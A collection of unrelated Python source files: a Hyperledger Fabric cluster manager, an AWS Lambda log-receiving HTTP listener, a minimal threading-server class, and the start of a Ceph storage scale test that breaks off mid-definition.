lg.DestroyQSL(qsl)
lg.DestroySUT(sut)
#
# write final results
#
if args.output:
with open("results.json", "w") as f:
json.dump(final_results, f, sort_keys=True, indent=4)
if __name__ == "__main__":
main()
|
cluster.py |
# Copyright IBM Corp, All Rights Reserved.
#
# SPDX-License-Identifier: Apache-2.0
#
import datetime
import logging
import os
import sys
import time
from uuid import uuid4
from threading import Thread
import socket
import requests
from pymongo.collection import ReturnDocument
sys.path.append(os.path.join(os.path.dirname(__file__), '..', '..'))
from agent import get_swarm_node_ip, KubernetesHost
from common import db, log_handler, LOG_LEVEL, utils
from common import CLUSTER_PORT_START, CLUSTER_PORT_STEP, \
NETWORK_TYPE_FABRIC_PRE_V1, NETWORK_TYPE_FABRIC_V1, \
CONSENSUS_PLUGINS_FABRIC_V1, NETWORK_TYPE_FABRIC_V1_1, \
WORKER_TYPES, WORKER_TYPE_DOCKER, WORKER_TYPE_SWARM, WORKER_TYPE_K8S, \
WORKER_TYPE_VSPHERE, VMIP, \
NETWORK_SIZE_FABRIC_PRE_V1, \
PEER_SERVICE_PORTS, EXPLORER_PORTS, \
ORDERER_SERVICE_PORTS, \
NETWORK_STATUS_CREATING, NETWORK_STATUS_RUNNING, NETWORK_STATUS_DELETING
from common import FabricPreNetworkConfig, FabricV1NetworkConfig
from modules import host
from agent import ClusterOnDocker, ClusterOnVsphere, ClusterOnKubernetes
from modules.models.host import Cluster as ClusterModel
from modules.models.host import Host as HostModel
from modules.models.host import ClusterSchema, CLUSTER_STATE, \
Container, ServicePort
logger = logging.getLogger(__name__)
logger.setLevel(LOG_LEVEL)
logger.addHandler(log_handler)
peer_service_ports = {
'peer{}_org{}_grpc': 7051,
'peer{}_org{}_event': 7053,
}
ca_service_ports = {
'ca_org{}_ecap': 7054,
}
class ClusterHandler(object):
""" Main handler to operate the cluster in pool
"""
def __init__(self):
self.col_active = db["cluster_active"]
self.col_released = db["cluster_released"]
self.host_handler = host.host_handler
self.cluster_agents = {
'docker': ClusterOnDocker(),
'swarm': ClusterOnDocker(),
'vsphere': ClusterOnVsphere(),
'kubernetes': ClusterOnKubernetes()
}
def list(self, filter_data={}, col_name="active"):
""" List clusters with given criteria
:param filter_data: Image with the filter properties
:param col_name: Use data in which col_name
:return: list of serialized doc
"""
result = []
if col_name in [e.name for e in CLUSTER_STATE]:
logger.debug("List all {} clusters".format(col_name))
filter_data.update({
"state": col_name
})
clusters = ClusterModel.objects(__raw__=filter_data)
result = self._schema(clusters, many=True)
else:
logger.warning("Unknown cluster col_name=" + col_name)
return result
def get_by_id(self, id, col_name="active"):
""" Get a cluster for the external request
:param id: id of the doc
:param col_name: collection to check
:return: serialized result or obj
"""
try:
state = CLUSTER_STATE.active.name if \
col_name != CLUSTER_STATE.released.name else \
CLUSTER_STATE.released.name
logger.info("find state {} cluster".format(state))
cluster = ClusterModel.objects.get(id=id, state=state)
except Exception:
logger.warning("No cluster found with id=" + id)
return {}
return self._schema(cluster)
def gen_service_urls(self, cid, peer_ports, ca_ports, orderer_ports,
explorer_ports):
"""
Generate the service urls based on the mapping ports
:param cid: cluster id to operate with
:param peer_ports: peer ports mapping
:param ca_ports: ca ports mapping
:param orderer_ports: orderer ports mapping
:param explorer_ports: explorer ports mapping
:return: service url mapping. {} means failure
"""
access_peer = 'peer0.org1.example.com'
access_ca = 'ca.example.com'
peer_host_ip = self._get_service_ip(cid, access_peer)
# explorer_host_ip = self._get_service_ip(cid, access_explorer)
# no api_url, then clean and return
if not peer_host_ip: # not valid api_url
logger.error("Error to find peer host url, cleanup")
self.delete(id=cid, record=False, forced=True)
return {}
ca_host_ip = self._get_service_ip(cid, access_ca)
service_urls = {}
for k, v in peer_ports.items():
service_urls[k] = "{}:{}".format(peer_host_ip, v)
for k, v in ca_ports.items():
service_urls[k] = "{}:{}".format(ca_host_ip, v)
for k, v in orderer_ports.items():
service_urls[k] = "{}:{}".format(ca_host_ip, v)
for k, v in explorer_ports.items():
service_urls[k] = "{}:{}".format(peer_host_ip, v)
return service_urls
def gen_ports_mapping(self, peer_num, ca_num, start_port, host_id):
"""
Generate the ports and service mapping for given size of network
:param peer_num: number of peers
:param ca_num: number of cas
:param start_port: mapping range start with
:param host_id: find ports at which host
:return: the mapping ports, empty means failure
"""
request_port_num = \
peer_num * (len(peer_service_ports.items())) + \
ca_num * len(ca_service_ports.items()) + \
len(ORDERER_SERVICE_PORTS.items()) + \
len(EXPLORER_PORTS.items())
logger.debug("request port number {}".format(request_port_num))
if start_port <= 0: # need to dynamic find available ports
ports = self.find_free_start_ports(host_id, request_port_num)
else:
ports = list(range(start_port, start_port + request_port_num))
if not ports:
logger.warning("No free port is found")
return {}, {}, {}, {}, {}
else:
logger.debug("ports {}".format(ports))
peer_ports, ca_ports, orderer_ports = {}, {}, {}
explorer_ports, all_ports = {}, {}
if peer_num > 1:
org_num_list = [1, 2]
peer_num_end = int(peer_num / 2)
else:
org_num_list = [1]
peer_num_end = 1
logger.debug("org num list {} peer_num_end {}".
format(org_num_list, peer_num_end))
pos = 0
for org_num in org_num_list: # map peer ports
for peer_num in range(0, peer_num_end):
for k, v in peer_service_ports.items():
peer_ports[k.format(peer_num, org_num)] = ports[pos]
logger.debug("pos {}".format(pos))
pos += 1
for org_num in org_num_list: # map ca ports
for k, v in ca_service_ports.items():
ca_ports[k.format(org_num)] = ports[pos]
logger.debug("pos={}".format(pos))
pos += 1
for k, v in ORDERER_SERVICE_PORTS.items(): # orderer ports
orderer_ports[k] = ports[pos]
logger.debug("pos={}".format(pos))
pos += 1
for k, v in EXPLORER_PORTS.items(): # explorer ports
explorer_ports[k] = ports[pos]
pos += 1
all_ports.update(peer_ports)
all_ports.update(ca_ports)
all_ports.update(orderer_ports)
all_ports.update(explorer_ports)
return all_ports, peer_ports, ca_ports, orderer_ports, explorer_ports
def _create_cluster(self, cluster, cid, mapped_ports, worker, config,
user_id, peer_ports, ca_ports, orderer_ports,
explorer_ports):
# start compose project, failed then clean and return
logger.debug("Start compose project with name={}".format(cid))
containers = self.cluster_agents[worker.type] \
.create(cid, mapped_ports, self.host_handler.schema(worker),
config=config, user_id=user_id)
if not containers:
logger.warning("failed to start cluster={}, then delete"
.format(cluster.name))
self.delete(id=cid, record=False, forced=True)
return None
# creation done, update the container table in db
for k, v in containers.items():
container = Container(id=v, name=k, cluster=cluster)
container.save()
# service urls can only be calculated after service is created
if worker.type == WORKER_TYPE_K8S:
service_urls = self.cluster_agents[worker.type]\
.get_services_urls(cid)
else:
service_urls = self.gen_service_urls(cid, peer_ports, ca_ports,
orderer_ports, explorer_ports)
# update the service port table in db
for k, v in service_urls.items():
service_port = ServicePort(name=k, ip=v.split(":")[0],
port=int(v.split(":")[1]),
cluster=cluster)
service_port.save()
# update api_url, container, user_id and status
self.db_update_one(
{"id": cid},
{
"user_id": user_id,
'api_url': service_urls.get('rest', ""),
'service_url': service_urls,
'status': NETWORK_STATUS_RUNNING
}
)
def check_health_work(cid):
time.sleep(60)
self.refresh_health(cid)
t = Thread(target=check_health_work, args=(cid,))
t.start()
host = HostModel.objects.get(id=worker.id)
host.update(add_to_set__clusters=[cid])
logger.info("Create cluster OK, id={}".format(cid))
def create(self, name, host_id, config, start_port=0,
user_id=""):
""" Create a cluster based on given data
TODO: maybe need other id generation mechanism
Args:
name: name of the cluster
host_id: id of the host URL
config: network configuration
start_port: first service port for cluster, will generate
if not given
user_id: user_id of the cluster if start to be applied
return: Id of the created cluster or None
"""
logger.info("Create cluster {}, host_id={}, config={}, start_port={}, "
"user_id={}".format(name, host_id, config.get_data(),
start_port, user_id))
worker = self.host_handler.get_active_host_by_id(host_id)
if not worker:
logger.error("Cannot find available host to create new network")
return None
if ClusterModel.objects(host=worker).count() >= worker.capacity:
logger.warning("host {} is already full".format(host_id))
return None
peer_num = int(config.get_data().get("size", 4))
ca_num = 2 if peer_num > 1 else 1
cid = uuid4().hex
mapped_ports, peer_ports, ca_ports, orderer_ports, explorer_ports = \
self.gen_ports_mapping(peer_num, ca_num, start_port, host_id)
if not mapped_ports:
logger.error("mapped_ports={}".format(mapped_ports))
return None
env_mapped_ports = dict(((k + '_port').upper(), str(v))
for (k, v) in mapped_ports.items())
network_type = config['network_type']
net = { # net is a blockchain network instance
'id': cid,
'name': name,
'user_id': user_id,
'worker_api': worker.worker_api,
'network_type': network_type, # e.g., fabric-1.0
'env': env_mapped_ports,
'status': NETWORK_STATUS_CREATING,
'mapped_ports': mapped_ports,
'service_url': {}, # e.g., {rest: xxx:7050, grpc: xxx:7051}
}
net.update(config.get_data())
# try to start one cluster at the host
cluster = ClusterModel(**net)
cluster.host = worker
cluster.save()
# start cluster creation asynchronously for better user experience.
t = Thread(target=self._create_cluster, args=(cluster, cid,
mapped_ports, worker,
config, user_id,
peer_ports, ca_ports,
orderer_ports,
explorer_ports))
t.start()
return cid
def delete(self, id, record=False, forced=False):
""" Delete a cluster instance
Clean containers, remove db entry. Only operate on active host.
:param id: id of the cluster to delete
:param record: Whether to record into the released collections
:param forced: Whether to removing user-using cluster, for release
:return:
"""
logger.debug("Delete cluster: id={}, forced={}".format(id, forced))
try:
cluster = ClusterModel.objects.get(id=id)
except Exception:
logger.warning("Cannot find cluster {}".format(id))
return False
c = self.db_update_one({"id": id}, {"status": NETWORK_STATUS_DELETING},
after=False)
# we are safe from occasional applying now
user_id = c.user_id # original user_id
if not forced and user_id != "":
# not forced, and chain is used by normal user, then no process
logger.warning("Cannot delete cluster {} by "
"user {}".format(id, user_id))
cluster.update(
set__user_id=user_id,
upsert=True
)
return False
else:
cluster.update(set__status=NETWORK_STATUS_DELETING, upsert=True)
host_id, worker_api, network_type, consensus_plugin, cluster_size = \
str(c.host.id), c.worker_api, \
c.network_type if c.network_type else NETWORK_TYPE_FABRIC_PRE_V1, \
c.consensus_plugin if c.consensus_plugin else \
CONSENSUS_PLUGINS_FABRIC_V1[0], \
c.size if c.size else NETWORK_SIZE_FABRIC_PRE_V1[0]
# port = api_url.split(":")[-1] or CLUSTER_PORT_START
h = self.host_handler.get_active_host_by_id(host_id)
if not h:
logger.warning("Host {} inactive".format(host_id))
cluster.update(set__user_id=user_id, upsert=True)
return False
if network_type == NETWORK_TYPE_FABRIC_V1:
config = FabricV1NetworkConfig(consensus_plugin=consensus_plugin,
size=cluster_size)
elif network_type == NETWORK_TYPE_FABRIC_V1_1:
config = FabricV1NetworkConfig(consensus_plugin=consensus_plugin,
size=cluster_size)
config.network_type = NETWORK_TYPE_FABRIC_V1_1
elif network_type == NETWORK_TYPE_FABRIC_PRE_V1:
config = FabricPreNetworkConfig(consensus_plugin=consensus_plugin,
consensus_mode='',
size=cluster_size)
else:
return False
config.update({
"env": cluster.env
})
delete_result = self.cluster_agents[h.type].delete(id, worker_api,
config)
if not delete_result:
logger.warning("Error to run compose clean work")
cluster.update(set__user_id=user_id, upsert=True)
return False
# remove cluster info from host
logger.info("remove cluster from host, cluster:{}".format(id))
h.update(pull__clusters=id)
c.delete()
return True
def delete_released(self, id):
""" Delete a released cluster record from db
:param id: id of the cluster to delete
:return: True or False
"""
logger.debug("Delete cluster: id={} from release records.".format(id))
self.col_released.find_one_and_delete({"id": id})
return True
def apply_cluster(self, user_id, condition={}, allow_multiple=False):
""" Apply a cluster for a user
:param user_id: which user will apply the cluster
:param condition: the filter to select
:param allow_multiple: Allow multiple chain for each tenant
:return: serialized cluster or None
"""
if not allow_multiple: # check if already having one
filt = {"user_id": user_id, "release_ts": "", "health": "OK"}
filt.update(condition)
c = self.col_active.find_one(filt)
if c:
logger.debug("Already assigned cluster for " + user_id)
return self._schema(c)
logger.debug("Try find available cluster for " + user_id)
cluster = ClusterModel.\
objects(user_id="",
network_type__icontains=condition.get("apply_type",
"fabric"),
size=condition.get("size", 0),
status=NETWORK_STATUS_RUNNING,
health="OK").first()
if cluster:
cluster.update(upsert=True, **{
"user_id": user_id,
"apply_ts": datetime.datetime.now()
})
logger.info("Now have cluster {} at {} for user {}".format(
cluster.id, cluster.host.id, user_id))
return self._schema(cluster)
logger.warning("Not find matched available cluster for " + user_id)
return {}
def release_cluster_for_user(self, user_id):
""" Release all cluster for a user_id.
:param user_id: which user
:return: True or False
"""
logger.debug("release clusters for user_id={}".format(user_id))
c = self.col_active.find({"user_id": user_id, "release_ts": ""})
cluster_ids = list(map(lambda x: x.get("id"), c))
logger.debug("clusters for user {}={}".format(user_id, cluster_ids))
result = True
for cid in cluster_ids:
result = result and self.release_cluster(cid)
return result
def release_cluster(self, cluster_id, record=True):
""" Release a specific cluster.
Release means delete and try best to recreate it with same config.
:param cluster_id: specific cluster to release
:param record: Whether to record this cluster to release table
:return: True or False
"""
c = self.db_update_one(
{"id": cluster_id},
{"release_ts": datetime.datetime.now()})
if not c:
logger.warning("No cluster find for released with id {}".format(
cluster_id))
return True
if not c.release_ts: # not have one
logger.warning("No cluster can be released for id {}".format(
cluster_id))
return False
return self.reset(cluster_id, record)
def start(self, cluster_id):
"""Start a cluster
:param cluster_id: id of cluster to start
:return: Bool
"""
c = self.get_by_id(cluster_id)
if not c:
logger.warning('No cluster found with id={}'.format(cluster_id))
return False
h_id = c.get('host_id')
h = self.host_handler.get_active_host_by_id(h_id)
if not h:
logger.warning('No host found with id={}'.format(h_id))
return False
network_type = c.get('network_type')
if network_type == NETWORK_TYPE_FABRIC_PRE_V1:
config = FabricPreNetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
consensus_mode=c.get('consensus_mode'),
size=c.get('size'))
elif network_type == NETWORK_TYPE_FABRIC_V1:
config = FabricV1NetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
size=c.get('size'))
elif network_type == NETWORK_TYPE_FABRIC_V1_1:
config = FabricV1NetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
size=c.get('size'))
config.network_type = NETWORK_TYPE_FABRIC_V1_1
else:
return False
result = self.cluster_agents[h.type].start(
name=cluster_id, worker_api=h.worker_api,
mapped_ports=c.get('mapped_ports', PEER_SERVICE_PORTS),
log_type=h.log_type,
log_level=h.log_level,
log_server='',
config=config,
)
if result:
if h.type == WORKER_TYPE_K8S:
service_urls = self.cluster_agents[h.type]\
.get_services_urls(cluster_id)
self.db_update_one({"id": cluster_id},
{'status': 'running',
'api_url': service_urls.get('rest', ""),
'service_url': service_urls})
else:
self.db_update_one({"id": cluster_id},
{'status': 'running'})
return True
else:
return False
def restart(self, cluster_id):
"""Restart a cluster
:param cluster_id: id of cluster to start
:return: Bool
"""
c = self.get_by_id(cluster_id)
if not c:
logger.warning('No cluster found with id={}'.format(cluster_id))
return False
h_id = c.get('host_id')
h = self.host_handler.get_active_host_by_id(h_id)
if not h:
logger.warning('No host found with id={}'.format(h_id))
return False
network_type = c.get('network_type')
if network_type == NETWORK_TYPE_FABRIC_PRE_V1:
config = FabricPreNetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
consensus_mode=c.get('consensus_mode'),
size=c.get('size'))
elif network_type == NETWORK_TYPE_FABRIC_V1:
config = FabricV1NetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
size=c.get('size'))
elif network_type == NETWORK_TYPE_FABRIC_V1_1:
config = FabricV1NetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
size=c.get('size'))
config.network_type = NETWORK_TYPE_FABRIC_V1_1
else:
return False
result = self.cluster_agents[h.type].restart(
name=cluster_id, worker_api=h.worker_api,
mapped_ports=c.get('mapped_ports', PEER_SERVICE_PORTS),
log_type=h.log_type,
log_level=h.log_level,
log_server='',
config=config,
)
if result:
if h.type == WORKER_TYPE_K8S:
service_urls = self.cluster_agents[h.type]\
.get_services_urls(cluster_id)
self.db_update_one({"id": cluster_id},
{'status': 'running',
'api_url': service_urls.get('rest', ""),
'service_url': service_urls})
else:
self.db_update_one({"id": cluster_id},
{'status': 'running'})
return True
else:
return False
def stop(self, cluster_id):
"""Stop a cluster
:param cluster_id: id of cluster to stop
:return: Bool
"""
c = self.get_by_id(cluster_id)
if not c:
logger.warning('No cluster found with id={}'.format(cluster_id))
return False
h_id = c.get('host_id')
h = self.host_handler.get_active_host_by_id(h_id)
if not h:
logger.warning('No host found with id={}'.format(h_id))
return False
network_type = c.get('network_type')
if network_type == NETWORK_TYPE_FABRIC_PRE_V1:
config = FabricPreNetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
consensus_mode=c.get('consensus_mode'),
size=c.get('size'))
elif network_type == NETWORK_TYPE_FABRIC_V1:
config = FabricV1NetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
size=c.get('size'))
elif network_type == NETWORK_TYPE_FABRIC_V1_1:
config = FabricV1NetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
size=c.get('size'))
config.network_type = NETWORK_TYPE_FABRIC_V1_1
else:
return False
result = self.cluster_agents[h.type].stop(
name=cluster_id, worker_api=h.worker_api,
mapped_ports=c.get('mapped_ports', PEER_SERVICE_PORTS),
log_type=h.log_type,
log_level=h.log_level,
log_server='',
config=config,
)
if result:
self.db_update_one({"id": cluster_id},
{'status': 'stopped', 'health': ''})
return True
else:
return False
def reset(self, cluster_id, record=False):
"""
Force to reset a chain.
Delete it and recreate with the same configuration.
:param cluster_id: id of the reset cluster
:param record: whether to record into released db
:return:
"""
c = self.get_by_id(cluster_id)
logger.debug("Run recreate_work in background thread")
cluster_name, host_id, network_type, \
= c.get("name"), c.get("host_id"), c.get("network_type")
if not self.delete(cluster_id, record=record, forced=True):
logger.warning("Delete cluster failed with id=" + cluster_id)
return False
network_type = c.get('network_type')
if network_type == NETWORK_TYPE_FABRIC_V1:
config = FabricV1NetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
size=c.get('size'))
elif network_type == NETWORK_TYPE_FABRIC_V1_1:
config = FabricV1NetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
size=c.get('size'))
config.network_type = NETWORK_TYPE_FABRIC_V1_1
else:
return False
if not self.create(name=cluster_name, host_id=host_id, config=config):
logger.warning("Fail to recreate cluster {}".format(cluster_name))
return False
return True
def reset_free_one(self, cluster_id):
"""
Reset some free chain, mostly because it's broken.
:param cluster_id: id to reset
:return: True or False
"""
logger.debug("Try reseting cluster {}".format(cluster_id))
self.db_update_one({"id": cluster_id, "user_id": ""},
{"status": NETWORK_STATUS_DELETING})
return self.reset(cluster_id)
def _serialize(self, doc, keys=('id', 'name', 'user_id', 'host_id',
'network_type',
'consensus_plugin',
'consensus_mode', 'worker_api',
'create_ts', 'apply_ts', 'release_ts',
'duration', 'containers', 'size', 'status',
'health', 'mapped_ports', 'service_url')):
""" Serialize an obj
:param doc: doc to serialize
:param keys: filter which key in the results
:return: serialized obj
"""
result = {}
if doc:
for k in keys:
result[k] = doc.get(k, '')
return result
def _get_service_ip(self, cluster_id, node='peer0'):
"""
Get the node's servie ip
:param cluster_id: The name of the cluster
:param host: On which host to search the cluster
:param node: name of the cluster node
:return: service IP or ""
"""
host_id = self.get_by_id(cluster_id).get("host_id")
host = self.host_handler.get_by_id(host_id)
if not host:
logger.warning("No host found with cluster {}".format(cluster_id))
return ""
worker_api, host_type = host.worker_api, host.type
if host_type not in WORKER_TYPES:
logger.warning("Found invalid host_type=%s".format(host_type))
return ""
# we should diff with simple host and swarm host here
if host_type == WORKER_TYPE_DOCKER: # single
segs = worker_api.split(":") # tcp://x.x.x.x:2375
if len(segs) != 3:
logger.error("Invalid daemon url = ", worker_api)
return ""
host_ip = segs[1][2:]
logger.debug("single host, ip = {}".format(host_ip))
elif host_type == WORKER_TYPE_SWARM: # swarm
host_ip = get_swarm_node_ip(worker_api, "{}_{}".format(
cluster_id, node))
logger.debug("swarm host, ip = {}".format(host_ip))
elif host_type == WORKER_TYPE_VSPHERE:
host_ip = host.vcparam[utils.VMIP]
logger.debug(" host, ip = {}".format(host_ip))
else:
logger.error("Unknown host type = {}".format(host_type))
host_ip = ""
return host_ip
def find_free_start_ports(self, host_id, number):
""" Find the first available port for a new cluster api
This is NOT lock-free. Should keep simple, fast and safe!
Check existing cluster records in the host, find available one.
:param host_id: id of the host
:param number: Number of ports to get
:return: The port list, e.g., [7050, 7150, ...]
"""
logger.debug("Find {} start ports for host {}".format(number, host_id))
if number <= 0:
logger.warning("number {} <= 0".format(number))
return []
host = self.host_handler.get_by_id(host_id)
if not host:
logger.warning("Cannot find host with id={}", host_id)
return ""
clusters_exists = ClusterModel.objects(host=host)
# clusters_valid = list(filter(lambda c: c.get("service_url"),
# clusters_exists))
# ports_existed = list(map(
# lambda c: int(c["service_url"]["rest"].split(":")[-1]),
# clusters_valid))
ports_existed = [service.port for service in
ServicePort.objects(cluster__in=clusters_exists)]
logger.debug("The ports existed: {}".format(ports_existed))
if len(ports_existed) + number >= 1000:
logger.warning("Too much ports are already in used.")
return []
candidates = [CLUSTER_PORT_START + i * CLUSTER_PORT_STEP
for i in range(len(ports_existed) + number)]
result = list(filter(lambda x: x not in ports_existed, candidates))
logger.debug("Free ports are {}".format(result[:number]))
return result[:number]
def refresh_health(self, cluster_id, timeout=5):
"""
Check if the peer is healthy by counting its neighbour number
:param cluster_id: id of the cluster
:param timeout: how many seconds to wait for receiving response
:return: True or False
"""
cluster = self.get_by_id(cluster_id)
cluster_id = cluster_id
logger.debug("Cluster ID: {}".format(cluster_id))
logger.debug("checking health of cluster={}".format(cluster))
if not cluster:
logger.warning("Cannot found cluster id={}".format(cluster_id))
return True
if cluster.get("status") != "running":
logger.warning("cluster is not running id={}".format(cluster_id))
return True
if cluster.get("network_type") == NETWORK_TYPE_FABRIC_PRE_V1:
rest_api = cluster["service_url"]["rest"] + "/network/peers"
if not rest_api.startswith("http"):
rest_api = "http://" + rest_api
logger.debug("rest_api={}".format(rest_api))
logger.debug("---In Network type Fabric V 0.6---")
try:
r = requests.get(rest_api, timeout=timeout)
except Exception as e:
logger.error("Error to refresh health of cluster {}: {}".
format(cluster_id, e))
return True
peers = r.json().get("peers")
logger.debug("peers from rest_api: {}".format(peers))
if len(peers) == cluster["size"]:
self.db_update_one({"id": cluster_id},
{"health": "OK"})
return True
else:
logger.debug("checking result of cluster id={}".format(
cluster_id, peers))
self.db_update_one({"id": cluster_id},
{"health": "FAIL"})
return False
elif "fabric-1" in cluster.get('network_type'):
service_url = cluster.get("service_url", {})
health_ok = True
for url in service_url.values():
ip = url.split(":")[0]
port = int(url.split(":")[1])
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((ip, port))
sock.close()
logger.debug("check {}:{} result {}".format(ip, port, result))
if result != 0:
health_ok = False
if not health_ok:
self.db_update_one({"id": cluster_id},
{"health": "FAIL"})
return False
else:
self.db_update_one({"id": cluster_id},
{"health": "OK"})
return True
return True
def db_update_one(self, filter, operations, after=True, col="active"):
"""
Update the data into the active db
:param filter: Which instance to update, e.g., {"id": "xxx"}
:param operations: data to update to db, e.g., {"$set": {}}
:param after: return AFTER or BEFORE
:param col: collection to operate on
:return: The updated host json dict
"""
state = CLUSTER_STATE.active.name if col == "active" \
else CLUSTER_STATE.released.name
filter.update({
"state": state
})
logger.info("filter {} operations {}".format(filter, operations))
kwargs = dict(('set__' + k, v) for (k, v) in operations.items())
for k, v in kwargs.items():
logger.info("k={}, v={}".format(k, v))
try:
ClusterModel.objects(id=filter.get("id")).update(
upsert=True,
**kwargs
)
doc = ClusterModel.objects.get(id=filter.get("id"))
except Exception as exc:
logger.info("exception {}".format(exc.message))
return None
return doc
def _schema(self, doc, many=False):
cluster_schema = ClusterSchema(many=many)
return cluster_schema.dump(doc).data
cluster_handler = ClusterHandler()
|
http_listener.py | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: MIT-0
import json
import os
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer
from threading import Event, Thread
""" Demonstrates code to set up an HTTP listener and receive log events
"""
RECEIVER_NAME = "sandbox"
LOCAL_DEBUGGING_IP = "0.0.0.0"
RECEIVER_PORT = 4243
def get_listener_address():
return RECEIVER_NAME if ("true" != os.getenv("AWS_SAM_LOCAL")) else LOCAL_DEBUGGING_IP
def http_server_init(queue):
def handler(*args):
LogsHandler(queue, *args)
listener_address = get_listener_address()
print(f"Initializing HTTP Server on {listener_address}:{RECEIVER_PORT}")
server = HTTPServer((listener_address, RECEIVER_PORT), handler)
# Ensure that the server thread is scheduled so that the server binds to the port
# and starts to listening before subscribe for the logs and ask for the next event.
started_event = Event()
server_thread = Thread(target=serve, daemon=True, args=(started_event, server,listener_address,))
server_thread.start()
rc = started_event.wait(timeout = 9)
if rc is not True:
raise Exception("server_thread has timedout before starting")
# Server implementation
class LogsHandler(BaseHTTPRequestHandler):
def __init__(self, queue, *args):
self.queue = queue
BaseHTTPRequestHandler.__init__(self, *args)
def do_POST(self):
try:
cl = self.headers.get("Content-Length")
if cl:
data_len = int(cl)
else:
data_len = 0
content = self.rfile.read(data_len)
self.send_response(200)
self.end_headers()
batch = json.loads(content.decode("utf-8"))
self.queue.put(batch)
except Exception as e:
print(f"Error processing message: {e}")
# Server thread
def serve(started_event, server, listener_name):
# Notify that this thread is up and running
started_event.set()
try:
print(f"Serving HTTP Server on {listener_name}:{RECEIVER_PORT}")
server.serve_forever()
except:
print(f"Error in HTTP server {sys.exc_info()[0]}")
finally:
if server:
server.shutdown()
|
server.py | """
Base threading server class
"""
from threading import Thread
class ThreadServer:
def __init__(self):
self.server_thread = None
self.running = False
def start(self, *args, **kwargs):
if self.running:
return
self.running = True
self.server_thread = Thread(target=self.run, args=args, kwargs=kwargs)
self.server_thread.start()
def stop(self):
self.running = False
def run(self):
"""
Server main function
"""
pass
class StaticServer:
def start(self, *args, **kwargs):
pass
def stop(self):
pass
|
test_pv_scale_and_respin_ceph_pods.py | """
PV Create with ceph pod respin & Memory Leak Test: Test the PVC limit
with 3 worker nodes create PVCs and check for memory leak
TO DO: This Test needs to be executed in Scaled setup,
Adding node scale is yet to be supported.
"""
import logging
import pytest
import threading
import time
from ocs_ci.helpers import helpers, disruption_helpers
from ocs_ci.ocs import constants
from ocs_ci.ocs.resources import pod
from ocs_ci.utility import utils
from ocs_ci.framework.testlib import scale, E2ETest, ignore_leftovers
from ocs_ci.framework.pytest_customization.marks import skipif_external_mode
log = logging.getLogger(__name__)
class BasePvcCreateRespinCephPods(E2ETest):
"""
Base Class to create POD with PVC and respin ceph Pods
"""
def create_pvc_pod(self, rbd_sc_obj, cephfs_sc_obj, number_of_pvc, size):
"""
Function to create multiple PVC of different type and bind mount them to pods
Args:
rbd_sc_obj (obj_dict): rbd storageclass object
cephfs_sc_obj (obj_dict): cephfs storageclass object
number_of_pvc (int): pvc count to be created for each types
size (str): size of each pvc to be created eg: '10Gi'
"""
log.info(f"Create {number_of_pvc} pvcs and pods")
cephfs_pvcs = helpers.create_multiple_pvc_parallel(
cephfs_sc_obj,
self.namespace,
number_of_pvc,
size,
access_modes=[constants.ACCESS_MODE_RWO, constants.ACCESS_MODE_RWX],
)
rbd_pvcs = helpers.create_multiple_pvc_parallel(
rbd_sc_obj,
self.namespace,
number_of_pvc,
size,
access_modes=[constants.ACCESS_MODE_RWO, constants.ACCESS_MODE_RWX],
)
# Appending all the pvc obj to base case param for cleanup and evaluation
self.all_pvc_obj.extend(cephfs_pvcs + rbd_pvcs)
# Create pods with above pvc list
cephfs_pods = helpers.create_pods_parallel(
cephfs_pvcs, self.namespace, constants.CEPHFS_INTERFACE
)
rbd_rwo_pvc, rbd_rwx_pvc = ([] for i in range(2))
for pvc_obj in rbd_pvcs:
if pvc_obj.get_pvc_access_mode == constants.ACCESS_MODE_RWX:
rbd_rwx_pvc.append(pvc_obj)
else:
rbd_rwo_pvc.append(pvc_obj)
rbd_rwo_pods = helpers.create_pods_parallel(
rbd_rwo_pvc, self.namespace, constants.CEPHBLOCKPOOL
)
rbd_rwx_pods = helpers.create_pods_parallel(
rbd_rwx_pvc, self.namespace, constants.CEPHBLOCKPOOL, raw_block_pv=True
)
temp_pod_objs = list()
temp_pod_objs.extend(cephfs_pods + rbd_rwo_pods)
# Appending all the pod obj to base class param for cleanup and evaluation
self.all_pod_obj.extend(temp_pod_objs + rbd_rwx_pods)
# Start respective IO on all the created PODs
threads = list()
for pod_obj in temp_pod_objs:
process = threading.Thread(
target=pod_obj.run_io,
args=(
"fs",
"512M",
),
)
process.start()
threads.append(process)
for pod_obj in rbd_rwx_pods:
process = threading.Thread(
target=pod_obj.run_io,
args=(
"block",
"512M",
),
)
process.start()
threads.append(process)
for process in threads:
process.join()
def respin_ceph_pod(self, resource_to_delete):
"""
Function to respin ceph pods one by one,
delete_resource functions checks for the deleted pod back up and running
Args:
resource_to_delete (str): Ceph resource type to be deleted, eg: mgr/mon/osd/mds
"""
disruption = disruption_helpers.Disruptions()
disruption.set_resource(resource=resource_to_delete)
no_of_resource = disruption.resource_count
for i in range(0, no_of_resource):
disruption.delete_resource(resource_id=i)
def cleanup(self):
"""
Function to cleanup the SC, PVC and POD objects parallel.
"""
helpers.delete_objs_parallel(pod.get_all_pods(namespace=self.namespace))
helpers.delete_objs_parallel(self.all_pvc_obj)
self.rbd_sc_obj.delete()
self.cephfs_sc_obj.delete()
@scale
@ignore_leftovers
@skipif_external_mode
@pytest.mark.parametrize(
argnames="resource_to_delete",
argvalues=[
pytest.param(*["mgr"], marks=[pytest.mark.polarion_id("OCS-766")]),
pytest.param(*["mon"], marks=[pytest.mark.polarion_id("OCS-764")]),
pytest.param(*["osd"], marks=[pytest.mark.polarion_id("OCS-765")]),
pytest.param(*["mds"], marks=[pytest.mark.polarion_id("OCS-613")]),
],
)
class TestPVSTOcsCreatePVCsAndRespinCephPods(BasePvcCreateRespinCephPods):
"""
Class for PV scale Create Cluster with 1000 PVC, then Respin ceph pods
Check for Memory leak, network and stats.
"""
@pytest.fixture()
def setup_fixture(self, request):
